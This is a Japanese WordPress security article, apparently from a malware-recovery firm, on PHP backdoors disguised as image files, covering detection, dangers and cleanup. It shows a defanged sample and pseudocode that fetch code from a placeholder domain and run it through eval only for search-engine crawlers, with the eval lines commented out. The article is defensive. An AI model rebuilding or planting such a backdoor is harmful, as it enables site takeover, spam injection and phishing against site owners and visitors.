目次
マルウェアの概要
画像偽装型マルウェアとは、拡張子を「.png」「.jpg」「.gif」などの画像ファイルに見せかけながら、内部にPHPなどの実行コードを埋め込んだバックドア型マルウェアです。
一見すると「ただの画像ファイル」に見えるため、FTP確認や目視チェックでは見逃されやすい特徴があります。
特にWordPressサイトでは、テーマ・プラグイン・uploadsフォルダ配下に設置されるケースが多く確認されています。
特徴
- load.png / fav.gif など自然な画像名を使用
- 実際にはPHPコードが含まれている
- require / include で読み込ませる構造
- 外部サーバーと通信するバックドア機能
- 検索エンジン用の条件分岐(クローラー判定)を含む場合がある
管理者が「画像だから安全」と思い込む心理を突く、非常に悪質な手法です。
無毒化したコードの一部をサンプルで表記
以下は画像に偽装されたPHPの典型例(危険部分を無効化):
<?php
// 画像ファイルに見せかけたPHPコード
$remote = "https://example-domain.com/index.php";
// 本来はここで外部通信
// $data = file_get_contents($remote);
// eval($data); ← 無効化
実際の攻撃コードでは、取得した内容を実行し、管理者追加やSEOスパム設置を行います。
感染ファイルの完全可読化ログ
解析すると、画像偽装型は以下の構造を持つことが多いです。
- 画像名で保存(例:load.png)
- 内部にPHPタグを含む
- 外部ドメインへ通信
- 条件分岐(Googlebot等のみ動作)
- 取得データを実行(危険部分は無効化)
擬似構造:
if (is_search_engine()) {
$payload = fetch_remote_code();
// eval($payload); ← 無効化
}
これは「SEOスパム誘導型」や「リモート制御型バックドア」に分類されます。
危険性
画像偽装型マルウェアが存在すると、以下のリスクがあります。
- 管理者アカウントの不正作成
- SEOスパムページの自動生成
- 検索順位の急落
- Google警告表示
- フィッシングページ設置
- サーバーの踏み台化
特に企業サイトでは、信用低下・取引停止・広告停止など重大な影響が発生します。
実際の感染事例
よくある侵入経路:
- 更新停止プラグインの脆弱性
- 不正アップロード機能の悪用
- FTP情報漏えい
- nulledテーマ利用
設置場所として多いのは:
- /wp-content/uploads/
- /wp-content/themes/テーマ名/
- ルート直下の画像ファイル
駆除と復旧の方法
1. 不審ファイルの削除
- 画像なのにサイズが異常に小さい/大きいファイルを確認
- 中身をテキストエディタで確認
2. WordPress再設置
- コアを公式から再アップロード
- テーマ・プラグインを正規版で再インストール
3. 外部通信先の確認
- 不審なドメイン
- 不審なcron設定
再発防止のセキュリティ対策
- 定期アップデート
- WAF導入
- ファイル改ざん監視
- 二段階認証導入
- 不要プラグイン削除
- 定期バックアップ
画像拡張子だから安全という思い込みを捨てることが重要です。
まとめ:早期対応がSEOと信頼回復のカギ
画像偽装型マルウェアは「見た目の安心感」を悪用する高度な手法です。
発見が遅れるほど、検索順位・信用・売上への影響が拡大します。
定期的なスキャンと専門的な解析体制が、被害最小化の鍵となります。
著者情報
WordPressのセキュリティ復旧・運用支援を専門する CreativeStudio樂のエンジニアユニット によって執筆されております。
WordPressのマルウェア駆除、改ざん復旧、セキュリティ強化の豊富な実務経験に基づき、企業サイトやブログ運営者が安心してサイトを運営できるよう支援しています。